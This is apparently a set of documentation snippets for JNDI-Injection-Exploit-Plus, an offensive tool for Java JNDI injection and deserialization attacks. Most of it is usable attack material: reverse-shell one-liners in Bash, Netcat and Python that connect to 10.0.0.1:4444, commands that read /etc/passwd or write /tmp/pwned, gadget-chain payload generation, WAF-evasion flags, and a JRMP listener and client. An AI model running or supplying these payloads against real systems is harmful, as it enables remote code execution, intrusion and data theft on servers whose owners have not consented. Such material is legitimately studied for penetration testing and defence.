### Execute Simple Commands Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/CONFIGURATION.md Examples of executing simple commands like calc.exe, whoami, and id using the tool.jar. ```bash # Executes: calc.exe (Windows) java -jar tool.jar -C "calc.exe" ``` ```bash # Executes: whoami java -jar tool.jar -C "whoami" ``` ```bash # Executes: id java -jar tool.jar -C "id" ``` -------------------------------- ### Execute Reverse Shell Commands Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/CONFIGURATION.md Provides examples for setting up reverse shells using Bash, Netcat (NC), and Python. ```bash # Bash reverse shell java -jar tool.jar -C "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" ``` ```bash # NC reverse shell (if available) java -jar tool.jar -C "bash -c 'nc -e /bin/bash 10.0.0.1 4444'" ``` ```bash # Python reverse shell java -jar tool.jar -C "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" ``` -------------------------------- ### JRMPListener and JRMPClient for JNDI Exploitation Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/README_zh.md Commands to start a JRMPListener for receiving JNDI exploit payloads and a JRMPClient to trigger the exploit. The JRMPClient command uses the tool to generate a payload. ```bash java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc ``` ```bash java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 ``` -------------------------------- ### Trigger JNDI Injection with Java Code Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/README_zh.md A Java example demonstrating how to trigger JNDI injection by looking up a remote RMI exploit. Ensure the RMI server is running and accessible. ```java class Test{ public static void main(String[] args) throws Exception{ InitialContext ctx = new InitialContext(); ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8"); } } ``` -------------------------------- ### Web Service for Deserialization Data Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/README_zh.md Start the JNDI-Injection-Exploit-Plus tool to run a web service that accepts POST requests for generating deserialization payloads. The service can return data in base64 or hex format. ```bash java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar ``` ```http POST /deserial/{Gadget} cmd={command}&wrapper={wrapper}output={base64/hex} ``` -------------------------------- ### Java Command Execution Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/CONFIGURATION.md Demonstrates the basic Java syntax for executing a command using Runtime.getRuntime().exec(). ```java String[] execArgs = new String[] { command }; Runtime.getRuntime().exec(execArgs); ``` -------------------------------- ### Run JNDI-Injection-Exploit-Plus Tool Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/README_zh.md Execute the JNDI-Injection-Exploit-Plus JAR with specified command and address. The default command is 'open /Applications/Calculator.app'. ```bash java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address] ``` ```bash java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" ``` -------------------------------- ### Generate Deserialization Payload with JNDI-Injection-Exploit-Plus Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/README_zh.md Generate a deserialization payload using the tool, specifying the command, gadget, and output format. The default command is 'open /Applications/Calculator.app'. ```bash java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] ``` ```bash java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 ``` -------------------------------- ### Execute Commands with Shell Metacharacters Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/CONFIGURATION.md Illustrates how to correctly execute commands involving pipes, redirects, or other shell features by explicitly invoking a shell like bash or cmd. ```bash # WRONG (pipes not supported by exec()) java -jar tool.jar -C "cat /etc/passwd | base64" ``` ```bash # CORRECT (explicit bash with -c) java -jar tool.jar -C "bash -c 'cat /etc/passwd | base64'" ``` ```bash # Windows CMD java -jar tool.jar -C "cmd /c dir C:\\" ``` ```bash # Bash java -jar tool.jar -C "bash -c 'id > /tmp/pwned'" ``` -------------------------------- ### Generate Deserialization Payload with Wrapper Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/README_zh.md Generate a deserialization payload using a specified wrapper (e.g., Xstream) for a given gadget and command. This is useful for bypassing WAFs or exploiting specific vulnerabilities. ```bash $ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream ``` -------------------------------- ### Jython Command Format Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/SERIALIZATION-GADGETS.md Specifies the command format for Jython deserialization exploits, requiring a local Python script path and a remote script location. ```text ; ``` -------------------------------- ### JSON Gadget Chain Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/SERIALIZATION-GADGETS.md Leverages json-lib for deserialization, leading to method invocation and remote code execution via Runtime.exec(). ```text ObjectInputStream.readObject() → JSONObject.fromObject() → PropertyUtilsBean.getProperty() → Method invocation → Runtime.exec(command) ``` -------------------------------- ### Hibernate Gadget Chain Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/SERIALIZATION-GADGETS.md Exploits deserialization through Hibernate's session factory initialization to achieve remote code execution. ```text ObjectInputStream.readObject() → TypedValue deserialization → Session factory initialization → Runtime.exec(command) ``` -------------------------------- ### Obfuscate Class Names for WAF Evasion Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/README_zh.md Use the '-F' flag to obfuscate class names, which can help in bypassing Web Application Firewalls (WAFs) during deserialization attacks. ```bash $ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F ``` -------------------------------- ### BeanShell Gadget Chain Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/SERIALIZATION-GADGETS.md Utilizes BeanShell's scripting engine for deserialization, enabling arbitrary code execution through eval(). ```text ObjectInputStream.readObject() → BshScriptEngineImpl → eval() execution → Runtime.exec(command) ``` -------------------------------- ### Groovy Gadget Chain Source: https://github.com/cckuailong/jndi-injection-exploit-plus/blob/master/_autodocs/SERIALIZATION-GADGETS.md Exploits deserialization via Groovy's MethodClosure to achieve method invocation and remote code execution. ```text ObjectInputStream.readObject() → MethodClosure deserialization → Method invocation → Runtime.exec(command) ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.